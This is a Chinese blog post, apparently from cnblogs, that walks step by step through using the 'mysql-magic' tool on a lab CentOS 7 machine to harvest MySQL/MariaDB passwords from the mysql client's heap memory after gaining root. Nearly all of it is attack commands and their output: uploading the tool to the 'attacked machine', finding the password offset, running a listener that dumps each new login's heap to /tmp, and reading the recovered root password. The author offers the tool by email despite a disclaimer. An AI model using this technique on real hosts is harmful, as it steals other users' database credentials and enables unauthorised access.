使用Mysql-magic获取Mysql账户密码
2024-09-05 06:53:07
版权声明:本文为博主原创文章,欢迎转载,转载请注明原文超链接https://www.cnblogs.com/zerotrust/p/10846530.html
本文仅限于技术讨论与分享,严禁用于非法用途。
在有root权限的情况下获得Mysql数据库密码的情况有很多,我们来使用其中一种,
mysql-magic
The mysql client read the password, then write this for some malloc'ed memory, and free it, but just because a chunk was freed doesn't mean it will be used again, to ensure that your programs not keep sensitive information in memory you must overwrite the memory.
The main goal is get the password passed through tty, but sometimes it also gets the password passed from command line (-pxxxxxx).
首先搭建测试环境,我这里用的是centos7
[root@baoleiji ~]# uname -a
Linux baoleiji 3.10.0-123.el7.x86_64 #1 SMP Mon Jun 30 12:09:22 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
[root@baoleiji ~]#
- 安装mariadb
[root@baoleiji ~]# yum -y install mariadb-server
[root@baoleiji ~]# yum -y install gcc
- 启动数据库,添加用户密码
作为依赖被升级:
mariadb-libs.x86_64 1:5.5.60-1.el7_5
完毕!
[root@baoleiji ~]# systemctl start mariadb
[root@baoleiji ~]# mysqladmin -u root password niub666
[root@baoleiji ~]# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 5.5.60-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
- 渗透环境搭建好了,上传工具到被攻击机
[banxia@banxia-pc 下载]$ scp -r ./mysql-magic root@192.168.2.3:~
- 进入mysql-magic目录编译
[root@baoleiji mysql-magic]# cd ~
[root@baoleiji ~]# cd
.cache/ .config/ Diamorphine/ mysql-magic/
[root@baoleiji ~]# cd
.cache/ .config/ Diamorphine/ mysql-magic/
[root@baoleiji ~]# cd mysql-magic/
[root@baoleiji mysql-magic]# make
- 在内存中搜索密码并获取偏移量
[root@baoleiji mysql-magic]# ./
ignotum/ mysql-magic src/
[root@baoleiji mysql-magic]# ./mysql-magic -s
[19:40:48] executing mysql (/usr/bin/mysql) ...
[19:40:48] pid = 2764
[19:40:48] waiting syscall exit_group
[19:40:48] exit detected !!!
[19:40:48] getting heap info
[19:40:48] reading the heap ...
[19:40:48] password found
[19:40:48] offset list: 0x850
- 启动监听模式
[root@baoleiji mysql-magic]# ./mysql-magic -o 0x850 -d /tmp -l
[19:42:53] waiting for connections
然后只要有人登录数据库就能拿到密码
[root@baoleiji mysql-magic]# ./mysql-magic -o 0x850 -d /tmp -l
[19:59:26] waiting for connections
[19:59:26] new connection found
[19:59:26] looking for mysql processes
[19:59:26] getting heap address of pid 3066
[19:59:26] heap = 7f69a70d5000-7f69a7118000
[19:59:26] 274432 bytes read of 274432
[19:59:26] heap saved to /tmp/3066-7f69a70d5000-7f69a7118000.dump
[19:59:26] string at offset 0x850:
[19:59:26] finish
ps:如上软件可能因为编码会显示不出来账号密码,如果没显示出来的话可以在/tmp目录下查看
[root@baoleiji strings /tmp/3000-7f09f89cd000-7f09f8a10000.dump
<charset5.5.60-MariaDB
<copyrig!
root
niub666
出于安全的目的就不放软件链接了,学习需要的可以单独留下邮箱,我发过去。
最新文章
- .NET Framework 框架的一些简单介绍
- 那些VisualStudio隐藏的调试功能
- Android Studio快捷键每日一练(6)
- oracle数据库迁移---windows环境下
- 1064. Complete Binary Search Tree
- 亲测PHP环境
- Android学习总结——TextView跑马灯效果
- Matlab近期用到的函数(持续更新)
- 使用 jQuery.Pin 垂直滚动时固定导航
- 自学Zabbix1.3-zabbix进程
- [C#6] 8-异常增强
- vue实战记录(六)- vue实现购物车功能之地址列表选配
- NGINX轻松管理10万长连接
- Poi 生成xls
- Dynamic attention in tensorflow
- linux下安装cmake(安装opencv库)
- 大臣的旅费|2013年蓝桥杯A组题解析第十题-fishers
- p标签不折行的问题
- 【动态规划】POJ-3176
- Multithread之为什么spinlock必须是volatile?
热门文章
- MySQL数据库相关资料
- WordPress的默认循环
- JS 正则表达式 控制文本框只能输入中文、英文、数字与指定特殊符号
- npm install, npm install -g, npm install --save, npm install --save-dev之间的区别
- 神经网络手写数字识别numpy实现
- TensorFlow.训练_资料(有视频)
- JS节流和防抖的区分和实现详解
- 使用pycharm开发web——django2.1.5(四)视图和模板相关
- Jquery中数组转字符串,c:foreach自动将带";,";字符串进行拆分赋值
- MQTT协议探究(二)